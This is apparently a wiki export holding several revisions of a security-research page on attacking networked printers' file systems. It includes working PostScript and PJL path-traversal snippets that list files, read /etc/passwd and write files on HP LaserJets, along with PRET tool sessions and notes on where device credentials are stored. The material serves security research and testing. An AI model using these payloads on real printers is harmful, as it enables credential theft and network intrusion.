leak sensitive information. Examples are given below (mostly untested). === HP === According to [http://hplipopensource.com] fax can be accessed using PML on HP devices. === Xerox === According to [http://www.office.xerox.com/support/dctips/dc02cc0280.pdf], Xerox uses proprietary PJL commands: <code>@PJL COMMENT OID_ATT_FAX_DESTINATION_PHONE "..."</code> === Brother === According to [http://brother-mfc.sourceforge.net/faxlanguage.txt], Brother uses the proprietary FCL (Fax Control Language): <code><Esc>DIALNUM[ (...) ]</code> === Lexmark === According to [https://www.lexmark.com/publications/pdfs/techref_WB.pdf] Lexmark uses proprietary PJL commands: <code>@PJL LFAX PHONENUMBER="..."</code> === Kyocera === According to [http://material.karlov.mff.cuni.cz/people/hajek/bizhub/femperonpsc200mu.pl] Kyocera uses proprietary PJL commands: <code>@PJL SET FAXTEL = ...</code> === Ricoh === Accroding to [http://www.objectiflune.com/forum2/ubbthreads.php?ubb=showflat&Number=29462&page=1] Ricoh uses proprietary PJL commands: <code>@PJL ENTER LANGUAGE=RFAX</code> == Scanner == Access to scan functionality on MFPs is not standardized and it seems only few vendors apply PJL commands for this task. Public documentation is missing, the [http://www.sane-project.org/sane-backends.html#SCANNERS SANE project] has reverse engineered some scanners. On Brother devices, the proprietary PostScript operator '''_brpdfscan''' may possibly be used. f0c65ac88a81329f5a215c484a043d1a0099a51d 0 51 639 636 2017-07-20T09:53:44Z Admin 1 wikitext text/x-wiki If an attacker has read access to the file system, she can potentially retrieve sensitive information like configuration files or stored print jobs. Manipulation of files through write access might even lead to remote code execution – for example by editing ''rc'' scripts or replacing binary files to be executed. Therefore printers should never allow direct access to the file system. However, legitimate language constructs are defined for PostScript <ref>''[https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf PostScript Language Reference Manual, 2nd Edition]'', Adobe Systems Inc., 1992, p. 71-80</ref> and PJL <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 9</ref> to do exactly this. Such features exist for historic reasons when bandwidth was a major bottleneck. Frequently used fonts and graphics are once downloaded to the device and can be re-used in further print jobs. While such functionality enhances printing performance, it poses a severe security risk to networked devices. == PostScript == The potential danger of PostScript file I/O primitives has been pointed out by <ref>''[https://www.cs.plu.edu/courses/CompSec/arts/mal.pdf Malicious Data and Computer Security]'', W. Sibert, Proceedings of the 19th National Information Systems Security Conference, 1996</ref>. An effort to systematically exploit PostScript functions to access the file system of printer devices has been made be <ref name="mueller2016printers">''Exploiting Network Printers'', J. Müller, 2016, p. 48-50</ref>. Example code to access the file system with PostScript on a ''HP LaserJet 4200N'' is given below: <syntaxhighlight lang=postscript> > /str 256 string def (%*%../*) % list all files > {==} str filenameforall < (%disk0%../webServer/home/device.html) < (%disk0%../webServer/.java.login.config) < (%disk0%../webServer/config/soe.xml) > /byte (0) def % read from file > /infile (../../../etc/passwd) (r) file def > { infile read {byte exch 0 exch put > (%stdout) (w) file byte writestring} > {infile closefile exit} ifelse > } loop < root::0:0::/:/bin/dlsh > /outfile (test.txt) (w+) file def}} % write to file > outfile (Hello World!) writestring > outfile closefile </syntaxhighlight> Accessing files with PostScript is supported by a large variety of printers, but usually sandboxed to a certain directory. This limits the possibilities of an attacker to mostly harmless actions like font modification. There are however exceptions: * Various '''HP LaserJet printers''' are prone to path traversal which allows access to the whole file system. This issue which affects almost forty HP devices has been discussed in [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5221 CVE-2012-5221] and is fixed in current firmware versions. The protection mechanism however is flawed as shown in <ref name="mueller2016printers"/>: By using <code>%*%</code> as disk prefix and replacing <code>../</code> with <code>.././</code> one is able to access the whole file system even for the latest firmware versions. The impact is significant: Passwords for the embedded web server can be found in <code>/dev/rdsk_jdi_cfg0</code> while the RAM is available for reading and writing at <code>/dev/dsk_ram0</code>. * Various '''OKI laser printers''' allows one level of path traversal, where a directory called ‘hidden’ is located which contains stored fax numbers, email contacts and local users' PINs as well as the SNMP community string and password. More interesting however is the fact that this MFP can be integrated into a network using features like Email-to-Print or Scan-to-FTP. Therefore we can find the passwords for LDAP, POP3, SMTP, outbound HTTP proxy, FTP, SMB and Webdav as well as the IPsec and Wi-Fi pre-shared keys. This is a good example how an attacker can escalate her way into a company's network, using the printer device as a starting point. '''How to test for this attack?''' File system access has been implemented in [[PRET]] in ''ps'' mode using the <code>ls</code>, <code>get</code>, <code>put</code>, <code>append</code>, <code>delete</code>, <code>rename</code>, <code>find</code>, <code>mirror</code>, <code>touch</code>, <code>mkdir</code>, <code>cd</code>, <code>pwd</code>, <code>chvol</code>, <code>traversal</code>, <code>format</code>, <code>fuzz</code> and <code>df</code> commands: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> ls ../.. d - Jan 1 1970 (created Jan 1 1970) bootdev d - Jan 1 1970 (created Jan 1 1970) dsk_jdi d - Jan 1 1970 (created Jan 1 1970) dsk_jdi_ss d - Jan 1 1970 (created Jan 1 1970) dsk_ram0 d - Jan 1 1970 (created Jan 1 1970) etc d - Jan 1 1970 (created Jan 1 1970) tmp d - Jan 1 1970 (created Jan 1 1970) webServer '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PJL == For PJL, the issue of accessing arbitrary files on a printer with PJL has first been demonstrated by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> who wrote the [[PFT|PFT and Hijetter]] programs to perform file operations on HP LaserJets using legitimate PJL commands. A virtual, distributed file system based on PJL has been proposed and implemented by <ref>''[http://www.remote-exploit.org/articles/printfs/ Printers Gone Wild]'', B. Smith, ShmooCon, 2011</ref>. Example code to access the file system access with PJL on a ''HP LaserJet 4200N'' is given below: > @PJL FSDIRLIST NAME="0:\" ENTRY=1 COUNT=65535 (list all files) < .\:\:TYPE=DIR < ..\:\:TYPE=DIR < PostScript TYPE=DIR < PJL TYPE=DIR < saveDevice TYPE=DIR < webServer TYPE=DIR > @PJL FSQUERY NAME="0:\..\..\etc\passwd" (read from file) < @PJL FSQUERY NAME="0:\..\..\etc\passwd" TYPE=FILE SIZE=23 > @PJL FSUPLOAD NAME="0:\..\..\etc\passwd" OFFSET=0 SIZE=23 < root::0:0::/:/bin/dlsh > @PJL FSDOWNLOAD SIZE=13 NAME="0:\test.txt" (write to file) > Hello World! Accessing files with PJL is not supported by many printers. Examples are given below: * Various '''HP LaserJet''' printers are prone to path traversal which allows access to the whole file system (see [http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-4107 CVE-2010-4107]). The countermeasure proposed by HP is to enable disk lock <ref>''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c02004333 Security Bulletin HPSBPI02575 SSRT090255 Rev. 1]'', HP Inc., 2010</ref> which can easily be broken either by resetting the device to [[factory defaults]] or by performing [[Credential disclosure#Brute-Force_Attacks|brute-force attacks]]. * Various '''HP OfficeJet Pro''' and '''PageWide Pro''' models allow attackers to read arbitrary files from the Linux based file system. Furthermore, a path traversal vulnerability exists which enables attackers to place a shellscript in <code>0:/../../rw/var/etc/profile.d/</code>, reboot the device (for example, using [[Factory_defaults#SNMP|SNMP]]) and therefore execute arbitrary commands <ref>''[https://www.tenable.com/blog/rooting-a-printer-from-security-bulletin-to-remote-code-execution Rooting a Printer: From Security Bulletin to Remote Code Execution]'', Jacob Baines, 2017</ref>. * For various '''Konica Minolta bizhub''' MFPs the contents of the root directory – which is a typical Linux file system – can be listed. One interesting file which can be read and written is <code>/../sysdata/acc/job.csv</code>, which contains logged print job metadata, including document titles and usernames. '''How to test for this attack?''' File system access has been implemented in [[PRET]] in ''pjl'' mode using the <code>ls</code>, <code>get</code>, <code>put</code>, <code>append</code>, <code>delete</code>, <code>find</code>, <code>mirror</code>, <code>touch</code>, <code>mkdir</code>, <code>cd</code>, <code>pwd</code>, <code>chvol</code>, <code>traversal</code>, <code>format</code>, <code>fuzz</code> and <code>df</code> commands: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> ls .. d - bootdev d - dsk_jdi d - dsk_jdi_ss d - dsk_ram0 d - etc d - lrt d - tmp d - webServer d - xps '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 35210e99ba8661c5e4a697dc861ae900537e807f 636 227 2017-07-02T17:44:34Z Admin 1 wikitext text/x-wiki If an attacker has read access to the file system, she can potentially retrieve sensitive information like configuration files or stored print jobs. Manipulation of files through write access might even lead to remote code execution – for example by editing ''rc'' scripts or replacing binary files to be executed. Therefore printers should never allow direct access to the file system. However, legitimate language constructs are defined for PostScript <ref>''[https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf PostScript Language Reference Manual, 2nd Edition]'', Adobe Systems Inc., 1992, p. 71-80</ref> and PJL <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 9</ref> to do exactly this. Such features exist for historic reasons when bandwidth was a major bottleneck. Frequently used fonts and graphics are once downloaded to the device and can be re-used in further print jobs. While such functionality enhances printing performance, it poses a severe security risk to networked devices. == PostScript == The potential danger of PostScript file I/O primitives has been pointed out by <ref>''[https://www.cs.plu.edu/courses/CompSec/arts/mal.pdf Malicious Data and Computer Security]'', W. Sibert, Proceedings of the 19th National Information Systems Security Conference, 1996</ref>. An effort to systematically exploit PostScript functions to access the file system of printer devices has been made be <ref name="mueller2016printers">''Exploiting Network Printers'', J. Müller, 2016, p. 48-50</ref>. Example code to access the file system with PostScript on a ''HP LaserJet 4200N'' is given below: <syntaxhighlight lang=postscript> > /str 256 string def (%*%../*) % list all files > {==} str filenameforall < (%disk0%../webServer/home/device.html) < (%disk0%../webServer/.java.login.config) < (%disk0%../webServer/config/soe.xml) > byte (0) def % read from file > infile (../../../etc/passwd) (r) file def > { infile read {byte exch 0 exch put > (%stdout) (w) file byte writestring} > {infile closefile exit} ifelse > } loop < root::0:0::/:/bin/dlsh > /outfile (test.txt) (w+) file def}} % write to file > outfile (Hello World!) writestring > outfile closefile </syntaxhighlight> Accessing files with PostScript is supported by a large variety of printers, but usually sandboxed to a certain directory. This limits the possibilities of an attacker to mostly harmless actions like font modification. There are however exceptions: * Various '''HP LaserJet printers''' are prone to path traversal which allows access to the whole file system. This issue which affects almost forty HP devices has been discussed in [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5221 CVE-2012-5221] and is fixed in current firmware versions. The protection mechanism however is flawed as shown in <ref name="mueller2016printers"/>: By using <code>%*%</code> as disk prefix and replacing <code>../</code> with <code>.././</code> one is able to access the whole file system even for the latest firmware versions. The impact is significant: Passwords for the embedded web server can be found in <code>/dev/rdsk_jdi_cfg0</code> while the RAM is available for reading and writing at <code>/dev/dsk_ram0</code>. * Various '''OKI laser printers''' allows one level of path traversal, where a directory called ‘hidden’ is located which contains stored fax numbers, email contacts and local users' PINs as well as the SNMP community string and password. More interesting however is the fact that this MFP can be integrated into a network using features like Email-to-Print or Scan-to-FTP. Therefore we can find the passwords for LDAP, POP3, SMTP, outbound HTTP proxy, FTP, SMB and Webdav as well as the IPsec and Wi-Fi pre-shared keys. This is a good example how an attacker can escalate her way into a company's network, using the printer device as a starting point. '''How to test for this attack?''' File system access has been implemented in [[PRET]] in ''ps'' mode using the <code>ls</code>, <code>get</code>, <code>put</code>, <code>append</code>, <code>delete</code>, <code>rename</code>, <code>find</code>, <code>mirror</code>, <code>touch</code>, <code>mkdir</code>, <code>cd</code>, <code>pwd</code>, <code>chvol</code>, <code>traversal</code>, <code>format</code>, <code>fuzz</code> and <code>df</code> commands: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> ls ../.. d - Jan 1 1970 (created Jan 1 1970) bootdev d - Jan 1 1970 (created Jan 1 1970) dsk_jdi d - Jan 1 1970 (created Jan 1 1970) dsk_jdi_ss d - Jan 1 1970 (created Jan 1 1970) dsk_ram0 d - Jan 1 1970 (created Jan 1 1970) etc d - Jan 1 1970 (created Jan 1 1970) tmp d - Jan 1 1970 (created Jan 1 1970) webServer '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PJL == For PJL, the issue of accessing arbitrary files on a printer with PJL has first been demonstrated by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> who wrote the [[PFT|PFT and Hijetter]] programs to perform file operations on HP LaserJets using legitimate PJL commands. A virtual, distributed file system based on PJL has been proposed and implemented by <ref>''[http://www.remote-exploit.org/articles/printfs/ Printers Gone Wild]'', B. Smith, ShmooCon, 2011</ref>. Example code to access the file system access with PJL on a ''HP LaserJet 4200N'' is given below: > @PJL FSDIRLIST NAME="0:\" ENTRY=1 COUNT=65535 (list all files) < .\:\:TYPE=DIR < ..\:\:TYPE=DIR < PostScript TYPE=DIR < PJL TYPE=DIR < saveDevice TYPE=DIR < webServer TYPE=DIR > @PJL FSQUERY NAME="0:\..\..\etc\passwd" (read from file) < @PJL FSQUERY NAME="0:\..\..\etc\passwd" TYPE=FILE SIZE=23 > @PJL FSUPLOAD NAME="0:\..\..\etc\passwd" OFFSET=0 SIZE=23 < root::0:0::/:/bin/dlsh > @PJL FSDOWNLOAD SIZE=13 NAME="0:\test.txt" (write to file) > Hello World! Accessing files with PJL is not supported by many printers. Examples are given below: * Various '''HP LaserJet''' printers are prone to path traversal which allows access to the whole file system (see [http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-4107 CVE-2010-4107]). The countermeasure proposed by HP is to enable disk lock <ref>''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c02004333 Security Bulletin HPSBPI02575 SSRT090255 Rev. 1]'', HP Inc., 2010</ref> which can easily be broken either by resetting the device to [[factory defaults]] or by performing [[Credential disclosure#Brute-Force_Attacks|brute-force attacks]]. * Various '''HP OfficeJet Pro''' and '''PageWide Pro''' models allow attackers to read arbitrary files from the Linux based file system. Furthermore, a path traversal vulnerability exists which enables attackers to place a shellscript in <code>0:/../../rw/var/etc/profile.d/</code>, reboot the device (for example, using [[Factory_defaults#SNMP|SNMP]]) and therefore execute arbitrary commands <ref>''[https://www.tenable.com/blog/rooting-a-printer-from-security-bulletin-to-remote-code-execution Rooting a Printer: From Security Bulletin to Remote Code Execution]'', Jacob Baines, 2017</ref>. * For various '''Konica Minolta bizhub''' MFPs the contents of the root directory – which is a typical Linux file system – can be listed. One interesting file which can be read and written is <code>/../sysdata/acc/job.csv</code>, which contains logged print job metadata, including document titles and usernames. '''How to test for this attack?''' File system access has been implemented in [[PRET]] in ''pjl'' mode using the <code>ls</code>, <code>get</code>, <code>put</code>, <code>append</code>, <code>delete</code>, <code>find</code>, <code>mirror</code>, <code>touch</code>, <code>mkdir</code>, <code>cd</code>, <code>pwd</code>, <code>chvol</code>, <code>traversal</code>, <code>format</code>, <code>fuzz</code> and <code>df</code> commands: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> ls .. d - bootdev d - dsk_jdi d - dsk_jdi_ss d - dsk_ram0 d - etc d - lrt d - tmp d - webServer d - xps '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- d544a2828ddc5bdc5b1867bc3cf40a864e81bef2 227 226 2017-01-24T17:52:59Z Admin 1 wikitext text/x-wiki If an attacker has read access to the file system, she can potentially retrieve sensitive information like configuration files or stored print jobs. Manipulation of files through write access might even lead to remote code execution – for example by editing ''rc'' scripts or replacing binary files to be executed. Therefore printers should never allow direct access to the file system. However, legitimate language constructs are defined for PostScript <ref>''[https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf PostScript Language Reference Manual, 2nd Edition]'', Adobe Systems Inc., 1992, p. 71-80</ref> and PJL <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 9</ref> to do exactly this. Such features exist for historic reasons when bandwidth was a major bottleneck. Frequently used fonts and graphics are once downloaded to the device and can be re-used in further print jobs. While such functionality enhances printing performance, it poses a severe security risk to networked devices. == PostScript == The potential danger of PostScript file I/O primitives has been pointed out by <ref>''[https://www.cs.plu.edu/courses/CompSec/arts/mal.pdf Malicious Data and Computer Security]'', W. Sibert, Proceedings of the 19th National Information Systems Security Conference, 1996</ref>. An effort to systematically exploit PostScript functions to access the file system of printer devices has been made be <ref name="mueller2016printers">''Exploiting Network Printers'', J. Müller, 2016, p. 48-50</ref>. Example code to access the file system with PostScript on a ''HP LaserJet 4200N'' is given below: <syntaxhighlight lang=postscript> > /str 256 string def (%*%../*) % list all files > {==} str filenameforall < (%disk0%../webServer/home/device.html) < (%disk0%../webServer/.java.login.config) < (%disk0%../webServer/config/soe.xml) > byte (0) def % read from file > infile (../../../etc/passwd) (r) file def > { infile read {byte exch 0 exch put > (%stdout) (w) file byte writestring} > {infile closefile exit} ifelse > } loop < root::0:0::/:/bin/dlsh > /outfile (test.txt) (w+) file def}} % write to file > outfile (Hello World!) writestring > outfile closefile </syntaxhighlight> Accessing files with PostScript is supported by a large variety of printers, but usually sandboxed to a certain directory. This limits the possibilities of an attacker to mostly harmless actions like font modification. There are however exceptions: * Various '''HP LaserJet printers''' are prone to path traversal which allows access to the whole file system. This issue which affects almost forty HP devices has been discussed in [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5221 CVE-2012-5221] and is fixed in current firmware versions. The protection mechanism however is flawed as shown in <ref name="mueller2016printers"/>: By using <code>%*%</code> as disk prefix and replacing <code>../</code> with <code>.././</code> one is able to access the whole file system even for the latest firmware versions. The impact is significant: Passwords for the embedded web server can be found in <code>/dev/rdsk_jdi_cfg0</code> while the RAM is available for reading and writing at <code>/dev/dsk_ram0</code>. * Various '''OKI laser printers''' allows one level of path traversal, where a directory called ‘hidden’ is located which contains stored fax numbers, email contacts and local users' PINs as well as the SNMP community string and password. More interesting however is the fact that this MFP can be integrated into a network using features like Email-to-Print or Scan-to-FTP. Therefore we can find the passwords for LDAP, POP3, SMTP, outbound HTTP proxy, FTP, SMB and Webdav as well as the IPsec and Wi-Fi pre-shared keys. This is a good example how an attacker can escalate her way into a company's network, using the printer device as a starting point. '''How to test for this attack?''' File system access has been implemented in [[PRET]] in ''ps'' mode using the <code>ls</code>, <code>get</code>, <code>put</code>, <code>append</code>, <code>delete</code>, <code>rename</code>, <code>find</code>, <code>mirror</code>, <code>touch</code>, <code>mkdir</code>, <code>cd</code>, <code>pwd</code>, <code>chvol</code>, <code>traversal</code>, <code>format</code>, <code>fuzz</code> and <code>df</code> commands: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> ls ../.. d - Jan 1 1970 (created Jan 1 1970) bootdev d - Jan 1 1970 (created Jan 1 1970) dsk_jdi d - Jan 1 1970 (created Jan 1 1970) dsk_jdi_ss d - Jan 1 1970 (created Jan 1 1970) dsk_ram0 d - Jan 1 1970 (created Jan 1 1970) etc d - Jan 1 1970 (created Jan 1 1970) tmp d - Jan 1 1970 (created Jan 1 1970) webServer '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PJL == For PJL, the issue of accessing arbitrary files on a printer with PJL has first been demonstrated by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> who wrote the [[PFT|PFT and Hijetter]] programs to perform file operations on HP LaserJets using legitimate PJL commands. A virtual, distributed file system based on PJL has been proposed and implemented by <ref>''[http://www.remote-exploit.org/articles/printfs/ Printers Gone Wild]'', B. Smith, ShmooCon, 2011</ref>. Example code to access the file system access with PJL on a ''HP LaserJet 4200N'' is given below: > @PJL FSDIRLIST NAME="0:\" ENTRY=1 COUNT=65535 (list all files) < .\:\:TYPE=DIR < ..\:\:TYPE=DIR < PostScript TYPE=DIR < PJL TYPE=DIR < saveDevice TYPE=DIR < webServer TYPE=DIR > @PJL FSQUERY NAME="0:\..\..\etc\passwd" (read from file) < @PJL FSQUERY NAME="0:\..\..\etc\passwd" TYPE=FILE SIZE=23 > @PJL FSUPLOAD NAME="0:\..\..\etc\passwd" OFFSET=0 SIZE=23 < root::0:0::/:/bin/dlsh > @PJL FSDOWNLOAD SIZE=13 NAME="0:\test.txt" (write to file) > Hello World! Accessing files with PJL is not supported by many printers. Examples are given below: * Various '''HP LaserJet printers''' are prone to path traversal which allows access to the whole file system (see [http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-4107 CVE-2010-4107]). The countermeasure proposed by HP is to enable disk lock <ref>''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c02004333 Security Bulletin HPSBPI02575 SSRT090255 Rev. 1]'', HP Inc., 2010</ref> which can easily be broken as discussed in [[Credential disclosure#Brute-Force_Attacks|Credential disclosure#brute-force attacks]]. * For various '''Konica Minolta bizhub''' MFPs the contents of the root directory – which is a typical Linux file system – can be listed. One interesting file which can be read and written is <code>/../sysdata/acc/job.csv</code>, which contains logged print job metadata, including document titles and usernames. '''How to test for this attack?''' File system access has been implemented in [[PRET]] in ''pjl'' mode using the <code>ls</code>, <code>get</code>, <code>put</code>, <code>append</code>, <code>delete</code>, <code>find</code>, <code>mirror</code>, <code>touch</code>, <code>mkdir</code>, <code>cd</code>, <code>pwd</code>, <code>chvol</code>, <code>traversal</code>, <code>format</code>, <code>fuzz</code> and <code>df</code> commands: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> ls .. d - bootdev d - dsk_jdi d - dsk_jdi_ss d - dsk_ram0 d - etc d - lrt d - tmp d - webServer d - xps '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- fef5b67bebdd873d3fc90b69c8cd87421bf2538d 226 2017-01-24T17:48:07Z Admin 1 Created page with "If an attacker has read access to the file system, she can potentially retrieve sensitive information like configuration files or stored print jobs. Manipulation of files thro..." wikitext text/x-wiki If an attacker has read access to the file system, she can potentially retrieve sensitive information like configuration files or stored print jobs. Manipulation of files through write access might even lead to remote code execution – for example by editing ''rc'' scripts or replacing binary files to be executed. Therefore printers should never allow direct access to the file system. However, legitimate language constructs are defined for PostScript <ref>''[https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf PostScript Language Reference Manual, 2nd Edition]'', Adobe Systems Inc., 1992, p. 71-80</ref> and PJL <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 9</ref> to do exactly this. Such features exist for historic reasons when bandwidth was a major bottleneck. Frequently used fonts and graphics are once downloaded to the device and can be re-used in further print jobs. While such functionality enhances printing performance, it poses a severe security risk to networked devices. == PostScript == The potential danger of PostScript file I/O primitives has been pointed out by <ref>''[https://www.cs.plu.edu/courses/CompSec/arts/mal.pdf Malicious Data and Computer Security]'', W. Sibert, Proceedings of the 19th National Information Systems Security Conference, 1996</ref>. An effort to systematically exploit PostScript functions to access the file system of printer devices has been made be <ref name="mueller2016printers">''Exploiting Network Printers'', J. Müller, 2016, p. 48-50</ref>. Example code to access the file system with PostScript on a ''HP LaserJet 4200N'' is given below: <syntaxhighlight lang=postscript> > /str 256 string def (%*%../*) % list all files > {==} str filenameforall < (%disk0%../webServer/home/device.html) < (%disk0%../webServer/.java.login.config) < (%disk0%../webServer/config/soe.xml) > byte (0) def % read from file > infile (../../../etc/passwd) (r) file def > { infile read {byte exch 0 exch put > (%stdout) (w) file byte writestring} > {infile closefile exit} ifelse > } loop < root::0:0::/:/bin/dlsh > /outfile (test.txt) (w+) file def}} % write to file > outfile (Hello World!) writestring > outfile closefile </syntaxhighlight> Accessing files with PostScript is supported by a large variety of printers, but usually sandboxed to a certain directory. This limits the possibilities of an attacker to mostly harmless actions like font modification. There are however exceptions: * Various '''HP LaserJet printers''' are prone to path traversal which allows access to the whole file system. This issue which affects almost forty HP devices has been discussed in [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5221 CVE-2012-5221] and is fixed in current firmware versions. The protection mechanism however is flawed as shown in <ref name="mueller2016printers"/>: By using <code>%*%</code> as disk prefix and replacing <code>../</code> with <code>.././</code> one is able to access the whole file system even for the latest firmware versions. The impact is significant: Passwords for the embedded web server can be found in <code>/dev/rdsk_jdi_cfg0</code> while the RAM is available for reading and writing at <code>/dev/dsk_ram0</code>. * Various '''OKI laser printers''' allows one level of path traversal, where a directory called ‘hidden’ is located which contains stored fax numbers, email contacts and local users' PINs as well as the SNMP community string and password. More interesting however is the fact that this MFP can be integrated into a network using features like Email-to-Print or Scan-to-FTP. Therefore we can find the passwords for LDAP, POP3, SMTP, outbound HTTP proxy, FTP, SMB and Webdav as well as the IPsec and Wi-Fi pre-shared keys. This is a good example how an attacker can escalate her way into a company's network, using the printer device as a starting point. '''How to test for this attack?''' File system access has been implemented in [[PRET]] in ''ps'' mode using the <code>ls</code>, <code>get</code>, <code>put</code>, <code>append</code>, <code>delete</code>, <code>rename</code>, <code>find</code>, <code>mirror</code>, <code>touch</code>, <code>mkdir</code>, <code>cd</code>, <code>pwd</code>, <code>chvol</code>, <code>traversal</code>, <code>format</code>, <code>fuzz</code> and <code>df</code> commands: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> ls ../.. d - Jan 1 1970 (created Jan 1 1970) bootdev d - Jan 1 1970 (created Jan 1 1970) dsk_jdi d - Jan 1 1970 (created Jan 1 1970) dsk_jdi_ss d - Jan 1 1970 (created Jan 1 1970) dsk_ram0 d - Jan 1 1970 (created Jan 1 1970) etc d - Jan 1 1970 (created Jan 1 1970) tmp d - Jan 1 1970 (created Jan 1 1970) webServer '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PJL == For PJL, the issue of accessing arbitrary files on a printer with PJL has first been demonstrated by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> who wrote the [[PFT|PFT and Hijetter]] programs to perform file operations on HP LaserJets using legitimate PJL commands. A virtual, distributed file system based on PJL has been proposed and implemented by <ref>''[http://www.remote-exploit.org/articles/printfs/ Printers Gone Wild]'', B. Smith, ShmooCon, 2011</ref>. Example code to access the file system access with PJL on a ''HP LaserJet 4200N'' is given below: > @PJL FSDIRLIST NAME="0:\" ENTRY=1 COUNT=65535 (list all files) < .\:\:TYPE=DIR < ..\:\:TYPE=DIR < PostScript TYPE=DIR < PJL TYPE=DIR < saveDevice TYPE=DIR < webServer TYPE=DIR > @PJL FSQUERY NAME="0:\..\..\etc\passwd" (read from file) < @PJL FSQUERY NAME="0:\..\..\etc\passwd" TYPE=FILE SIZE=23 > @PJL FSUPLOAD NAME="0:\..\..\etc\passwd" OFFSET=0 SIZE=23 < root::0:0::/:/bin/dlsh > @PJL FSDOWNLOAD SIZE=13 NAME="0:\test.txt" (write to file) > Hello World! Accessing files with PJL is not supported by many printers. Examples are given below: * Various '''HP LaserJet printers''' are prone to path traversal which allows access to the whole file system (see [http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-4107 CVE-2010-4107]). The countermeasure proposed by HP is to enable disk lock <ref>''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c02004333 Security Bulletin HPSBPI02575 SSRT090255 Rev. 1]'', HP Inc., 2010</ref> which can easily be broken as discussed in [Credential disclosure#Brute-Force_Attacks|Credential disclosure#brute-force attacks]. * For various '''Konica Minolta bizhub''' MFPs the contents of the root directory – which is a typical Linux file system – can be listed. One interesting file which can be read and written is <code>/../sysdata/acc/job.csv</code>, which contains logged print job metadata, including document titles and usernames. '''How to test for this attack?''' File system access has been implemented in [[PRET]] in ''pjl'' mode using the <code>ls</code>, <code>get</code>, <code>put</code>, <code>append</code>, <code>delete</code>, <code>find</code>, <code>mirror</code>, <code>touch</code>, <code>mkdir</code>, <code>cd</code>, <code>pwd</code>, <code>chvol</code>, <code>traversal</code>, <code>format</code>, <code>fuzz</code> and <code>df</code> commands: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> ls d - PJL d - PostScript d - saveDevice d - webServer '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 5f47d14df76ef73239453c4b69f4f5fc58b5534a 0 44 638 321 2017-07-03T15:46:28Z Admin 1 /* Epson */ wikitext text/x-wiki The dangers of malicious firmware updates are well-known and have been discussed early by <ref>''[https://www.cs.cornell.edu/~kozen/papers/acsac.pdf Malicious Code Detection for Open Firmware]'', F. Adelstein, M. Stillerman and D. Kozen, Computer Security Applications Conference, 2002. Proceedings. 18th Annual, IEEE, 2002, p. 403-412</ref> and <ref>''[http://ceur-ws.org/Vol-190/paper11.pdf Phishing with Consumer Electronics: Malicious Home Routers]'', A. Tsow, MTW 190, 2006</ref>. In contrast to other networked devices however, '''it is common for printers to deploy firmware updates as ordinary print jobs'''. This opens up a wide gateway for attackers because access to printing functionality is usually a low hurdle. One can only speculate about the motivation for such insecure design decisions but it seems logical that historic reasons play a role: Printers used to be connected by parallel or USB cable. Without network connectivity, security was less important and without a password-protected web server or similar functionality the printing channel was the only way to send data to the device. Firmware modification attacks against network printers have been demonstrated by <ref name="cui2011print">''[http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf Print Me If You Dare: Firmware Modification Attacks and the Rise of Printer Malware]'', A. Cui and J. Stolfo, 2011</ref> for HP devices, 